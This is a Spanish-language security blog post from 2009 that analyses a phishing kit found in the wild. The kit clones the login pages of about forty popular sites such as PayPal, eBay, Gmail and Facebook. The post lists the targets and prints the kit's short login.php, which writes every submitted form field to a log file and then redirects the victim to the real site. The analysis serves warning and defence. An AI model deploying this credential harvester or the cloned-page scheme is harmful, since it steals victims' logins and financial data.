Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

lunes, 16 de febrero de 2009

Phishing Kit In-the-Wild para clonación de sitios web

Una de las estrategias más habituales para realizar ataques de Phishing se localiza en el empleo de clonaciones de sitios web; es decir, una página falsa muy similar a la real mediante la cual se busca robar información confidencial y de índole financiero de las personas a través de Internet.

Este Kit de Phishing propone precisamente eso. Se trata de un conjunto de páginas web de sitios conocidos listos para ser subidos a algún servidor fantasma y comenzar a diseminar, (spamear) mediante Ingeniería Social orientadas, como no puede ser de otra manera, a explotar las debilidades del eslabón más débil dentro de la cadena de seguridad: el factor humano.

Por el momento, y digo por el momento porque seguramente quienes distribuyen este kit irán ampliando la gama de clonaciones, las propuestas de ataques de Phishing son las siguientes:

AOL.com
AIM.com
d2jsp.org
DailyMotion.com
eBay.com
eBuddy
eGold
EverQuest Forum
FaceBook.com
FileFront.com
Gmail.com
Gmail.de
Habbo.de
Habbohotel.com
Hi5.com
Hotmail
ICQ.com
store.apple.com
Megaupload.com
MetaCafe
MMOCheats.com
Myspace.com
Nexon.net
OGame.de
Oxedion.de
dhl.de (Packstation)
PayPal.com
PhotoBucket.com
RapidShare.com
RapidShare.de
Ripway.com
Siteworld.de
Skype.com
store.steampowered.com
Strato.com
Usenext.com
VanGuard
Windows Live
Yahoo.com
YouTube.com






Como verán, muchas de las páginas son masivamente conocidas y ampliamente utilizadas.


Cada una de las carpetas que alojan la clonación contienen, además del index.html, un archivo de texto plano en donde se almacena la información registrada de la víctima y un login.php que contiene el siguiente código:
?php
header ('Location: website');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?

Donde la función header ('Location: ') contiene la información del sitio y $handle = fopen("log.txt", "a") abre el archivo de texto log.txt en modo apertura y escritura.

La mayoría de estas clonaciones se encuentran activas por lo que es necesario estar atentos al acceder a sitios web cuyos servicios sean similares.

Por otro lado, claramente se refleja que el kit fue pensado para cometer fraudes, y el hecho de encontrarse disponible en Internet lo torna aún más peligroso potenciando las probabilidades de ser potenciales víctimas de estas acciones fraudulentas.

Información relacionada
Phishing y cuentos en navidad
Phishing para American Express y consejos


# pistus

0 comentarios:

Publicar un comentario